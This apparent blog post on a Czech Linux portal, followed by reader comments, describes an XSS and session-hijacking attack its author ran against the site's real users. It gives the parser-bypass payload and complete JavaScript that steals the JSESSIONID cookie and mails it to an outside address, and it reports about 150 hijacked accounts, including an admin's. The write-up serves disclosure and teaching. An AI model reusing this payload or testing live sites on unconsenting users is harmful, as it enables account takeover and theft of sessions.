abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×

dnes 11:00 | Zajímavý software
Na Good Old Games je v rámci aktuálních zimních slev zdarma k dispozici remasterovaná verze klasické point&click adventury Grim Fandango, a to bez DRM a pro mainstreamové OS včetně GNU/Linuxu. Akce trvá do 14. prosince, 15:00 SEČ.
Fluttershy, yay! | Komentářů: 2
dnes 07:22 | Pozvánky

Konference InstallFest 2018 proběhne o víkendu 3. a 4. března 2018 v Praze na Karlově náměstí 13. Spuštěno bylo CFP. Přihlásit přednášku nebo workshop lze do 18. ledna 2018.

Ladislav Hagara | Komentářů: 0
včera 20:22 | Nová verze

Před měsícem byla vydána Fedora 27 ve dvou edicích: Workstation pro desktopové a Atomic pro cloudové nasazení. Fedora Server byl "vzhledem k náročnosti přechodu na modularitu" vydán pouze v betaverzi. Finální verze byla naplánována na leden 2018. Plán byl zrušen. Fedora 27 Server byl vydán již dnes. Jedná se ale o "klasický" server. Modularita se odkládá.

Ladislav Hagara | Komentářů: 6
včera 10:22 | Zajímavý článek

Lukáš Růžička v článku Kuchařka naší Růži aneb vaříme rychlou polévku z Beameru na MojeFedora.cz ukazuje "jak si rychle vytvořit prezentaci v LaTeXu, aniž bychom se přitom pouštěli do jeho bezedných hlubin".

Ladislav Hagara | Komentářů: 13
včera 07:22 | Komunita

Od 26. do 29. října proběhla v Bochumi European Coreboot Conference 2017 (ECC'17). Na programu této konference vývojářů a uživatelů corebootu, tj. svobodné náhrady proprietárních BIOSů, byla řada zajímavých přednášek. Jejich videozáznamy jsou postupně uvolňovány na YouTube.

Ladislav Hagara | Komentářů: 0
11.12. 19:22 | Nová verze

Ondřej Filip, výkonný ředitel sdružení CZ.NIC, oznámil vydání verze 2.0.0 open source routovacího démona BIRD (Wikipedie). Přehled novinek v diskusním listu a v aktualizované dokumentaci.

Ladislav Hagara | Komentářů: 0
11.12. 09:22 | Pozvánky

V Praze dnes probíhá Konference e-infrastruktury CESNET. Na programu je řada zajímavých přednášek. Sledovat je lze i online na stránce konference.

Ladislav Hagara | Komentářů: 2
9.12. 20:11 | Nová verze

Byl vydán Debian 9.3, tj. třetí opravná verze Debianu 9 s kódovým názvem Stretch a Debian 8.10, tj. desátá opravná verze Debianu 8 s kódovým názvem Jessie. Řešeny jsou především bezpečnostní problémy, ale také několik vážných chyb. Instalační média Debianu 9 a Debianu 8 lze samozřejmě nadále k instalaci používat. Po instalaci stačí systém aktualizovat.

Ladislav Hagara | Komentářů: 6
9.12. 00:44 | Nová verze

Po 6 měsících vývoje od vydání verze 0.13.0 byla vydána verze 0.14.0 správce balíčků GNU Guix a na něm postavené systémové distribuce GuixSD (Guix System Distribution). Na vývoji se podílelo 88 vývojářů. Přibylo 1 211 nových balíčků. Jejich aktuální počet je 6 668. Aktualizována byla také dokumentace.

Ladislav Hagara | Komentářů: 4
8.12. 21:33 | Nová verze

Po půl roce vývoje od vydání verze 5.9 byla vydána nová stabilní verze 5.10 toolkitu Qt. Přehled novinek na wiki stránce. Současně byla vydána nová verze 4.5.0 integrovaného vývojového prostředí (IDE) Qt Creator nebo verze 1.10 nástroje pro překlad a sestavení programů ze zdrojových kódů Qbs.

Ladislav Hagara | Komentářů: 0
Jak se vás potenciálně dotkne trend odstraňování analogového audio konektoru typu 3,5mm jack z „chytrých telefonů“?
 (8%)
 (1%)
 (1%)
 (1%)
 (75%)
 (14%)
Celkem 974 hlasů
 Komentářů: 45, poslední 1.12. 19:00
    Rozcestník

    XSS + Session hijacking = Hack abclinuxu.cz

    24.7.2007 09:32 | Přečteno: 8317× | bezpecnost | poslední úprava: 10.3.2008 10:01

    Včera (23.07.2007) o 10:00 ráno ste určite mnohí narazili na podozrivo vyzerajúci zápis do blogu s názvom KUPUJEM portal abclinuxu.cz. Jednalo sa samozrejme o hoax, za ktorý sa všetkým ospravedlňujem. Nikto síce jeho obsahu príliš neveril, avšak svoj účel splnil - prilákať čo najväčšiu pozornosť. Fakt, že zápis obsahoval zákerný JavaScript, bol pred očami všetkých (alebo väčšiny) návštevníkov skrytý.


    Čo je XSS (Cross-site scripting) ?

    XSS je útok založený na schopnosti útočníka vložiť do stránky nejaký kód (HTML, JavaScript prípadne oboje) pomocou speciálne formulovaného linku alebo vstupu do formulára. Veľmi bežným príkladom sú napríklad prihlasovacie formuláre, ktoré sa svojim používateľom snažia veci uľahčiť. Po vložení loginu a hesla a za predpokladu, že heslo nebude správne, nám server vygeneruje formulár s už vyplneným loginom (rovnakým, aký bol zadaný). Formulár by mohol vyzerať napríklad takto:

    <form action="login.php" method="post">
    	<input type="text" name="login" value="">
    	<input type="password" name="heslo">
    	<input type="submit" value="Odoslat">
    </form>
    

    Ak vstup, v tomto prípade samotný login, nie je korektne ošetrený od tzv. metaznakov (úvodzovky, apostrofy, je väčšie ako, je menšie ako, ...), útočník bude schopný do stránky vložiť svoj kód. Povedzme, že do vyššie uvedeného formulára zadáme do kolonky login tento reťazec (heslo dáme ľubovoľné):

    "><script>alert('hack!');</script><q q="
    

    Server, snažiac sa ušetriť nám náš drahocenný čas, vráti prihlasovací formulár a do kolonky login doplní nami zadaný reťazec. Vznikne tým niečo takéto:

    <form action="login.php" method="post">
    	<input type="text" name="login" value=""><script>alert('hack!');</script><q q="">
    	<input type="password" name="heslo">
    	<input type="submit" value="Odoslat">
    </form>
    

    Čo je Session hijacking ?

    Pre pochopenie tohto útoku je najskôr potrebné porozumieť spôsobu, akým sa prihlasovanie a následné overovanie používateľov na weboch vykonáva.


    Ihneď po prihlásení nejakého používateľa mu server vygeneruje unikátny identifikátor (reťazec náhodných znakov), ktorý zašle naspäť jedným z týchto dvoch spôsobov:

    1. ako súčasť URL, naspäť ho klient zasiela metódou GET,
    2. ako cookie (väčšina webov, vrátane abclinuxu, používa tento spôsob).

    Tento identifikátor (označovaný ako SESSION_ID) sa následne počas trvania sedenia používa ako akési dočasné heslo. Server si ho priradí k určitému používateľovi a _každého_, kto mu tento identifikátor zašle, považuje za daného, autentifikovaného, používateľa a povolí mu prístup na jeho konto už bez ďaľšieho zadávania loginu a hesla. Po odhlásení je SESSION_ID na strane serveru vymazané (a teda už viac nepoužiteľné).


    Session hijacking (alebo 'Krádež sedenia') spočíva v zmocnení sa SESSION_ID už prihláseného používateľa. Každý, komu sa to podarí, bude vystupovať ako daný používateľ a to _bez_ nutnosti zadávať login alebo heslo.


    Príklad použitia XSS + Session hijacking na abclinuxu.cz

    Abclinuxu.cz sa proti XSS chráni metódou 'whitelisting': Má zoznam povolených HTML tagov a ku každému zoznam povolených argumentov. Všetko ostatné je zakázané. Jedná sa o najúčinnejšiu, avšak z programátorského hľadiska aj najzložitejšiu metódu - celý vstup je potrebné najskôr rozparsovať a následne odfiltrovať 'to zakázané', pričom treba pamätať na kopu iných detailov a drobností (ktoré sú bohužial/naštastie mimo tohto článku). Práve na spomínanom parsovaní abclinuxu zlyhalo.


    Parser sa mi podarilo oklamať týmto HTML kódom:

    <<img src="http://www.abclinuxu.cz/images/site2/sun14.png" alt="" width="0" height="0" onload="TU BOL JAVASCRIPT">>
    
    Poznámka: Obrázok musí odkazovať na existujúci súbor/URL, inak sa obsah argumentu 'onload' nevykoná.

    Dôležité sú prvé dva znaky, resp. zdvojenie znaku 'je menšie ako', čo spôsobilo nesprávne vyhodnotenie argumentov tagu <IMG>. SESSION_ID som následne získal takto (na abclinuxu sa ukladá do cookie s názvom 'JSESSIONID'):

    var cookie = '';
    var part_num = 0;
    var cookie_var = document.cookie.split('; ');
    while (part_num < cookie_var.length) {
    	if (cookie_var[part_num].split('=')[0] == 'JSESSIONID') {
    		cookie = cookie_var[part_num].split('=')[1];
    		break;
    	}
    	part_num += 1;
    }
    

    Jediný problém, ktorý som v tejto chvíli musel ešte vyriešiť, bol spôsob 'dopravenia' tohto ID až ku mne. Najskôr som si ho chcel proste zaslat pomocou nejakého môjho skriptu niekde na webe (proste donútiť 'obeť' navštíviť niečo takéto: azuritov_web/skript.php?id=session_id ) avšak aby to bolo úplne transparentné, musel som na to použiť JavaScriptový 'XMLHttpRequest'. Narazil som však na problém: XMLHttpRequest sa bez výslovného povolenia od používateľa (v podobe dialógového okna vysvetlujúceho riziko) nepripojí mimo URL stránky, na ktorej JavaScript beží. Inými slovami, na zaslanie ID som mohol použiť iba skripty, ktoré boli priamo súčasťou abclinuxu. Zameral som sa teda na formulár pre odosielanie mailov, ktorý abclinuxu obsahuje. Je na ňom síce ochrana v podobe nutnosti zadať serverom vygenerovaný kód pred odoslaním mailu, avšak jeho obídenie by zvládlo aj malé dieta. Pod mojími prstami následne vznikol tento kód (trochu skrátený):

    xmlhttp.open('GET', '/Profile?action=sendEmail&uid=15224');
    xmlhttp.send('');
    var pole = xmlhttp.responseText.split(' ');
    
    var kod = '';
    var part_num = 0;
    while (part_num < pole.length) {
    	if (pole[part_num] == 'hodnotu') {
    		kod = pole[part_num+1].substring(0,4);
    		break;
    	}
    	part_num += 1;
    }
    
    xmlhttp.open('GET', '/Mail?KOD=' + kod + '&sender=admin%40pobox.sk&cc=&bcc=&subject=' + cookie + '&message='  + cookie + '&finish=Odeslat&url=%2FProfile%2F15224&action=finish');
    xmlhttp.send('');
    

    Najkôr sa pripojím na 'mailový formulár', príjmem HTML stránku vrátenú serverom a následne v nej nájdem overovací kód. Potom ho už len použijem na odoslanie mailu. A ID je moje!


    Priebeh samotného útoku

    Zápis v blogu som publikoval včera (23.07.2007) o 10:00 ráno pričom doslova ihneď sa mi na maili začali množiť SESSION_ID-čka rôznych ľudí. O cca 10:10 mi došlo ID Roberta Krátkeho (admin, plný prístup) a o 10:30 som JavaScript z blogu odstránil a útok tým ukončil. Ako bonus prikladám obrázky z administračného rozhrania (príloha B). Za týchto 30 minút som sa dostal na kontá cca 150tich ľudí.


    Záver

    Rád by som upozornil, že môj kód v žiadnom prípade nie je dokonalý. Je to prakticky len cca tretí prípad, keby som sa vo svojom živote stretol s JavaScriptom. Odpustite si preto prosím všetky poznámky smerujúce k nemu a prípadne aj jeho opravy/vylepšenia. Ďakujem. Chyba je už v tejto chvíli (dúfajme, že úplne) odstránená a všetci používatelia, ktorí v hore uvedenom čase zápis v blogu otvorili, by sa mali odhlasiť a znovu prihlásiť (vygeneruje sa im tak nové SESSION_ID, staré bude teda už nepoužiteľné).


    Dodatok

    Nakoniec som sa od Leoša dozvedel, že sa vlastne jednalo o takmer _rok_ starú dieru, ktorej sa zjavne venovalo priliš málo času a postupne upadla do zabudnutia. Viz. bug #544. Chyba sa nenachádzala priamo v abclinuxu ale v knižnici htmlparser (v ktorej bola medzičasom opravená). Leošovi tento 'prešľap' netreba mať za zlé: Má toho naozaj veľa, takže sa ani nečudujem, že sa sem-tam niečo podobné objaví. Hlavne, že sa to dobre skončilo :) .


    Príloha A (kompletný kód)

    <<img src="http://www.abclinuxu.cz/images/site2/sun14.png" alt="" width="0" height="0" onload="
    
    var kod = '';
    var cookie = '';
    var xmlhttp = null;
    
    function get_mail_data() {
    	if (xmlhttp.readyState == 4 && xmlhttp.status == 200 && xmlhttp.responseText != null) {
    		var pole = xmlhttp.responseText.split(' ');
    		var part_num = 0;
    		var cookie_var = document.cookie.split('; ');
    		while (part_num < cookie_var.length) {
    			if (cookie_var[part_num].split('=')[0] == 'JSESSIONID') {
    				cookie = cookie_var[part_num].split('=')[1];
    				break;
    			}
    			part_num += 1;
    		}
    		part_num = 0;
    		while (part_num < pole.length) {
    			if (pole[part_num] == 'hodnotu') {
    				kod = pole[part_num+1].substring(0,4);
    				break;
    			}
    			part_num += 1;
    		}
    		send_cookie();
    	}
    }
    
    function get_mail() {
    	var failed = false;
    	try {
    		xmlhttp = new ActiveXObject('Msxml2.XMLHTTP');
    	} catch (e1) {
    		try {
    			xmlhttp = new ActiveXObject('Microsoft.XMLHTTP');
    		} catch (e2) {
    			xmlhttp = null;
    		}
    	}
    	if (! xmlhttp) {
    		if (typeof XMLHttpRequest != 'undefined') {
    			xmlhttp = new XMLHttpRequest();
    		} else {
    			failed = true;
    		}
    	}
    	if (! failed) {
    		xmlhttp.onreadystatechange = get_mail_data;
    		xmlhttp.open('GET', '/Profile?action=sendEmail&uid=15224');
    		xmlhttp.send('');
    	}
    }
    
    function send_cookie() {
    	var failed = false;
    	try {
    		xmlhttp = new ActiveXObject('Msxml2.XMLHTTP');
    	} catch (e1) {
    		try {
    			xmlhttp = new ActiveXObject('Microsoft.XMLHTTP');
    		} catch (e2) {
    			xmlhttp = null;
    		}
    	}
    	if (! xmlhttp) {
    		if (typeof XMLHttpRequest != 'undefined') {
    			xmlhttp = new XMLHttpRequest();
    		} else {
    			failed = true;
    		}
    	}
    	if (! failed) {
    		xmlhttp.open('GET', '/Mail?KOD=' + kod + '&sender=admin%40pobox.sk&cc=&bcc=&subject=' + cookie + '&message='  + cookie + '&finish=Odeslat&url=%2FProfile%2F15224&action=finish');
    		xmlhttp.send('');
    	}
    }
    
    get_mail();
    
    ">>
    

    Príloha B (obrázky)


    Odkazy (wikipedia)

    Cross-site scripting
    Session hijacking
    XMLHttpRequest
           

    Hodnocení: 100 %

            špatnédobré        

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    24.7.2007 10:03 qiRzT | skóre: 14 | blog: U_Marvina
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    Já pořád říkám, že současný web je prohnilá záležitost a chtělo by to opravdu pořádnou revoluci...
    Důležité je vědět jak problém vyřešit, zbytek zvládne i cvičená opice...
    24.7.2007 10:05 Lu-Tze | skóre: 15 | blog: Lu-Tzeho blog
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    Hmm, nic moc, na podobné téma tu psal třeba Michal Čihař. On teda chybu ohlásil, počkal až to bude opravené a pak o tom napsal. Trik "<<" tu už byl taky použitý - např. pro vkládání obrázků do komentářů, asi to neopravili dobře.
    24.7.2007 10:08 azurIt | skóre: 34 | blog: zatial_bez_mena
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    chybu som nahlasil, pockal som kym sa opravila a potom som o tom pisal. tiez som pisal, ze sa jedna o rok staru chybu, cital si to vobec ? ;)
    24.7.2007 11:08 Lu-Tze | skóre: 15 | blog: Lu-Tzeho blog
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    Ne, nečetl :-) Ale právě proto jsem to formuloval tak, abys mi nemoh vyčítat, že ti něco vyčítám ;-)
    24.7.2007 11:00 Stevko
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    Ako na toto pozerám, tak ten vypnutý JavaScript asi nie je až taký zlý nápad. Ale potom zasa na mňa divne pozerajú ľudia, keď mi chcú ukázať nejakú stránku a ona nejako nefunguje. Veď nech si pozerajú.
    24.7.2007 11:14 tired joe | skóre: 17 | blog: rootlet | Trenčín/Bratislava
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    Kúsok po revolúcii jeden chlapík v banke upozorňoval na to, že ich bezpečnostný systém je deravý a že sa peniaze dajú ľahko ukradnúť elektronicky. Keď ho nikto nepočúval, ukážkovo previedol nejaké prachy, aby videli, že sa to naozaj dá. Vtedy sa mi zdalo nespravodlivé, že ho súd poslal do basy. Ale teraz to už chápem. :)
    Človek sa riadi zdravým rozumom, až keď už nezostáva žiadne iné riešenie.
    Joseph avatar 24.7.2007 11:27 Joseph | skóre: 7 | blog: No_bullshiting_please | Ba'aretz
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    trhni si nohou. mam noscript. ;) a kecy o tom ze sa web bez js neda pouzivat su bullshity.
    אם אין אני לי, מי לי; וכשאני לעצמי, מה אני; ואם לא עכשיו, אימתי.(פרקי אבות, פרק א, משנה יד
    freshmouse avatar 24.7.2007 11:31 freshmouse | skóre: 42 | blog: Bruno Banány
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    Well.Done. :-)
    andree avatar 24.7.2007 11:51 andree | skóre: 39 | blog: andreeeeelog
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    lol :-D

    +1
    24.7.2007 11:40 Petr Beran
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    Pěkné, moc pěkné :-)
    Beer: The cause of, and solution to, all of life's problems.
    24.7.2007 12:24 Robert Krátký | skóre: 94 | blog: Robertův bloček
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    Mám jediný dotaz: proč kvůli tomuto dalšímu zápisku zakládáš zcela nový blog?
    24.7.2007 12:30 azurIt | skóre: 34 | blog: zatial_bez_mena
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    ak narazas na konto 'jaaa' + jeho blog, tak to mozes kludne cele zrusit. vytvoril som ho iba koli tej jednej sprave, pouzivat ho uz viac nebudem. toto je moje konto a teda som si na nom vytvoril moj blog.
    andree avatar 24.7.2007 12:32 andree | skóre: 39 | blog: andreeeeelog
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    skoda komentarov... :)
    24.7.2007 13:38 Robert Krátký | skóre: 94 | blog: Robertův bloček
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    Bezva. Jak jistě víš, tak smazat blog, pod kterým jsou komentáře, není možné. Kvůli tvému pokusu tedy bude na abclinuxu další opuštěný blog s jediným zápiskem. To by bylo tak těžké pro tvůj pokus použít ten samý blog, ve kterým jsi vydal tento zápisek?
    StefanV avatar 24.7.2007 13:11 StefanV | skóre: 11
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz

    ze jmena bloku to bylo partné : test2 ;-)

    Jinak tohle je parádní blog, spíše to beru jako ukázkovou security kapitolu. V porovnání s blogy typu "Zkoušel jsem Gentoo, tak a tak...." je tohle alespoň něco pořádného.

    Já bych v blocích psal samí blbosti, tak jsme s tím radči ani nezačal.

    Viva el presidente...
    24.7.2007 13:40 Robert Krátký | skóre: 94 | blog: Robertův bloček
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    ze jmena bloku to bylo partné : test2 ;-)
    Co je patrné? Copak nemůže být testovací zápisek v normálním blogu? Je nutné kvůli tomu vytvářet nové konto a k němu nový blog a zasírat tak abclinuxu mrtvými účty?
    24.7.2007 13:43 azurIt | skóre: 34 | blog: zatial_bez_mena
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    serie ta, ze som ziskal pristup prave na tvoje konto alebo co ? :)
    24.7.2007 13:55 Robert Krátký | skóre: 94 | blog: Robertův bloček
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    Milý azurite, již včera jsme ti s Leošem oba poděkovali za upozornění na chybu. Ani včera ani dnes jsem ti nevyčítal, jakým způsobem jsi chybu demonstroval (ačkoliv si dokáži představit rozumnější postup - zvláště pokud by ti nešlo o zviditelnění, ale pouze o pomoc abíčku). Nevadí mi tedy, kam a jak jsi získal přístup.

    Štve mě to, co jsem napsal, že mě štve - zbytečné a neuvážené zakládání nového účtu a blogu. Projev tedy trochu té inteligence, s jejíž pomocí jsi chybu odhalil, i tady v diskuzi a nesnaž se odvádět pozornost takto přihlouplým způsobem.
    24.7.2007 14:07 azurIt | skóre: 34 | blog: zatial_bez_mena
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    neviem ktory z nas sa tu sprava prihluplo - proste musis sa na nieco stazovat, tak si najdes hocijaku blbost. ako uz napisal freshmouse, keby si chcel, tak to zmazat ide. na abicku su doslova stovky nepouzivanych kont a urce velka kopa nepouzivanych blogov. chces mi povedat, ze do majitela kazdeho jedneho z nich si tiez takto 'huboval' ako teraz do mna ? pochybujem o tom..
    24.7.2007 15:00 Robert Krátký | skóre: 94 | blog: Robertův bloček
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    proste musis sa na nieco stazovat, tak si najdes hocijaku blbost.
    a) Proč myslíš, že si musím stěžovat?

    b) Nepovažuji to za blbost, proto o tom mluvím.
    keby si chcel, tak to zmazat ide.
    Ano, technicky to možné je, ale udělat to nemůžeme, protože bychom tím smazali komentáře dalších uživatelů.
    na abicku su doslova stovky nepouzivanych kont a urce velka kopa nepouzivanych blogov.
    A protože jich tu je spousta, tak jeden další už nevadí? Já bych raději, kdyby tu nebyly žádné nepoužívané účty a žádné nepoužívané blogy. Takže mi vadí každý další.
    chces mi povedat, ze do majitela kazdeho jedneho z nich si tiez takto 'huboval' ako teraz do mna ? pochybujem o tom..
    No vidíš, pleteš se. Kdykoliv jsem si všiml, že někdo založil zbytečně nový účet, tak jsem ho na to upozornil a zeptal se, co ho k tomu vedlo. Kdykoliv někdo napíše požadavek, abych nějaké dva účty sloučili a ten starší (ke kterému třeba zapomněl heslo) vymazali, tak se to snažíme udělat.

    Takže jsem si nezasedl na tebe. Napsal bych to stejně komukoliv jinému - a nebylo by to poprvé.
    Michal Fecko avatar 24.7.2007 15:53 Michal Fecko | skóre: 31 | blog: Poznámkový blog
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    ostatne zda sa mi ze si dost casto mrzuty pri reakciach v blogoch/diskusii a pod.. sekirujes, upozornujes, hundres - ako spravny admin (?!) :-D
    24.7.2007 16:55 Leoš Literák | skóre: 74 | blog: LL | Praha
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    Ja bych rekl, ze je to obycejna lidska unava. Kdyz clovek vidi nejakou chybu ci problem podesate, zacne jej to stve a reaguje s tim, ze uz je to tu podesate. Jenze pro cloveka, co ji zrovna udelal, je to poprve a tak nechape tu podrazdenost. Docela hezky je to znazorneno v Ucastnicich zajezdu, kdy ridici mezi sebou diskutuji na tema ukradenych plastovych podsalku :-)

    Pak je tu jeste faktor nevdeku. Nekteri ctenari na chybu upozorni stylem "vy lumpove, nefunguje vam RSS, urcite to delate kvuli reklame". Nebo "pred hodinou jsem vam poslal upozorneni na chybu, ocekaval jsem okamzitou reakci a nic, zjevne je vam to uplne jedno". Pripadne "Proc nezabanujete trolla XY? Urcite to delate kvuli impresim reklame. Neplatite si ho nahodou, aby vam zvysoval navstevnost?". Pak to chce hodne trpelivosti, aby clovek nereagoval podrazdene.
    Zakladatel tohoto portálu. Twitter, LinkedIn, blog, StackOverflow
    David Ježek avatar 24.7.2007 17:26 David Ježek | skóre: 83 | blog: Mostly_IMDB | Poděbrady
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    jakobys mi to vzal z úst. jinak tento zápisek je pro mne spíš důkazem potřeby se nějak zviditelnit a to založení druhého konta je fakt kravina. naopak měly být obě veci v jednom blogu kvůli návaznosti. ale což. Roberte, navrhuju se vožrat (jenže já tu nic nemam :-()
    freshmouse avatar 24.7.2007 13:54 freshmouse | skóre: 42 | blog: Bruno Banány
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    Hmm, to je dost tzv. přisprostlá a rádobyostrá reakce... :-O

    Je to takový problém, že někde v DB je pár řádků navíc? Nehledě na to: kdybyste CHTĚLI, aby to šlo smazat (i přes to, že tam jsou komentáře), tak by to šlo. To víme oba dva.
    24.7.2007 14:04 Robert Krátký | skóre: 94 | blog: Robertův bloček
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    Je to takový problém, že někde v DB je pár řádků navíc?
    Ne. Ale třeba v přehledu všech blogů to už tak jedno není.
    kdybyste CHTĚLI, aby to šlo smazat (i přes to, že tam jsou komentáře), tak by to šlo. To víme oba dva.
    No samozřejmě, že by to technicky šlo. Ale tím bychom smazali komentáře všech těch lidí, kteří na zápisek reagovali - a proto to nemůžeme udělat. To víme oba dva, že? Já nemám nic proti zápisku, odhalení chyby v abíčku, ani proti diskuzi pod tím (naopak to oceňuji a jsem rád, že na to azurit upozornil). Mně vadí jen to, že kvůli tomu byl zbytečně založen další účet a blog.
    Milan Lajtoš avatar 24.7.2007 17:38 Milan Lajtoš | skóre: 22 | blog: /blog/babraq
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    A nebolo by lahsie zmenit autora toho blogpostu na azurita? Komentare ostanu, blogpost tiez, zbytocny blog a user sa mozu zmazat a vsetci budu spokojny.. ;o)
    “Every great achievement was once considered impossible.”
    24.7.2007 17:42 azurIt | skóre: 34 | blog: zatial_bez_mena
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    okrem mna ;) keby som to tak chcel, tak to urobim hned
    24.7.2007 17:45 Marián André | skóre: 10 | blog: Qblog
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    Čím sa vlastne dostávame znovu k otázke: Prečo nový user a blog ?
    24.7.2007 17:53 azurIt | skóre: 34 | blog: zatial_bez_mena
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    znovu ? uz sa pri nej niekde bolo ?
    24.7.2007 17:56 Marián André | skóre: 10 | blog: Qblog
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    24.7.2007 17:58 azurIt | skóre: 34 | blog: zatial_bez_mena
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    aha, Robert tam hovoril o blogu, takze ma to nejak hned nenapadlo.
    Milan Lajtoš avatar 24.7.2007 18:43 Milan Lajtoš | skóre: 22 | blog: /blog/babraq
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    Preco to vlastne nechces? Ci len z trucu aby robertK mohol dalej penit? ;)
    “Every great achievement was once considered impossible.”
    24.7.2007 14:06 Filip Jirsák | skóre: 67 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    Že bych si taky založil testovací účet? A testovací blog? Taky bych mohl začít přidávat nějaké testovací záznamy do FAQ nebo Hardwaru, pokládat testovací dotazy do poradny a psát testovací komentáře. Vždyť je to jenom pár bajtů v databázi…

    Nejdete třeba taky o to, že se teď při každém vyhledávání uživatelů nebo blogů, pokud splní zadaná kritéria, dostane tenhle testovací blog na seznam výsledků? A tam už to není jen nějaký řádek v DB, tam už to obtěžuje nějakého konkrétního čtenáře, který v horším případě odkaz rozklikne aby teprve následně zjistil, že to byl vlastně jenom test. Spousta "hlušiny" je jedna z věcí, které mohou totálně zničit server postavený na komunitě budující obsah. Proto se zde v Poradně neponechávají dotazy mimo téma, ale jsou zamykány a následně (snad) odstraňovány. Myslím, že ze stejného důvodu se Robertovi nelíbí vytváření testovacích blogů.
    24.7.2007 14:39 zalesak
    Rozbalit Rozbalit vše No nechapem
    Ked raz zverejnite nejaky system = otvorite ho sirokej verejnosti, potom nechapem ako sa mozete stazovat na nieco taketo. bud si zavedte kontrolu a schvalovanie vytvarania blogov, alebo si povolte ich rusenie prip. deaktivovanie (nezmazu sa komentare ale blog sa nebude zobrazovat). Ak sa nieco da spravit, user to na 100% vyskusa, s tym treba pocitat pri programovani akehokolvek systemu... vazne nerozumiem o com to tu cele je.. stazujete sa azuritovi za to, ze ste si zle navrhli a implementovali system alebo o co presne ide?
    Luboš Doležel (Doli) avatar 24.7.2007 14:42 Luboš Doležel (Doli) | skóre: 98 | blog: Doliho blog | Kladensko
    Rozbalit Rozbalit vše Re: No nechapem
    Takže když si někdo bude stěžovat na drobné krádeže v ČR, tak je to taky nesmysl, protože je chybně navržen systém - každý by měl mít za zadkem policajta?
    StefanV avatar 24.7.2007 14:48 StefanV | skóre: 11
    Rozbalit Rozbalit vše Re: No nechapem

    Nemyslím, že tohle je dobré přirovnání. Hodilo by se spíše něco jako:

    "Kdyby každý položil na ulici prázdnou krabici, neměl by je právě orgán k tomu pověřený sebrat a vyhodit?? I kdyby byly plné bordelu."

    Za předpokladu ignorování ideálního stavu neexistence nežádoucích krabic

    Viva el presidente...
    24.7.2007 14:51 zalesak
    Rozbalit Rozbalit vše Re: No nechapem
    Veci okolo kradeze osetruje trestny zakon, ked sa ti nepaci ako sa tu spravaju ludia, daj si do vseobecnych podmienok sposob pouzivania portalu a napis tam aj sankcie. Ak ti vznikla skoda zalozenim blogu, ktory porusil vseobecne podmienky (ak samozrejme nejake su) a sposobilo ti to skodu, ktoru dokazes vycislit, nic ti nebrani v tom aby si si narokoval nahradu skod sudnou cestou. Ked sme teda uz pri tom porovnavani s kradezami...
    24.7.2007 15:23 Filip Jirsák | skóre: 67 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: No nechapem
    Já tedy raději předpokládám, že uživatelé nebudou zbytečně vytvářet nové účty a blogy, a řeším věc domluvou. Teprve pokud to jinak nejde, přikročím k nějakému technickému omezení – ale každé takové technické omezení beru jako svým způsobem selhání. Systémy, které se snaží být naprosto dokonalé a vše řešit technicky naopak nesnáším, protože dokonalé nejsou ani náhodou a člověka akorát omezují nebo otravují. Navíc ona "ideální technická dokonalost" ve vztahu k lidem je pěkný nesmysl – lidi nejsou součástky do nějakého stroje, aby se všichni chovali předvídatelně a naprosto stejně.

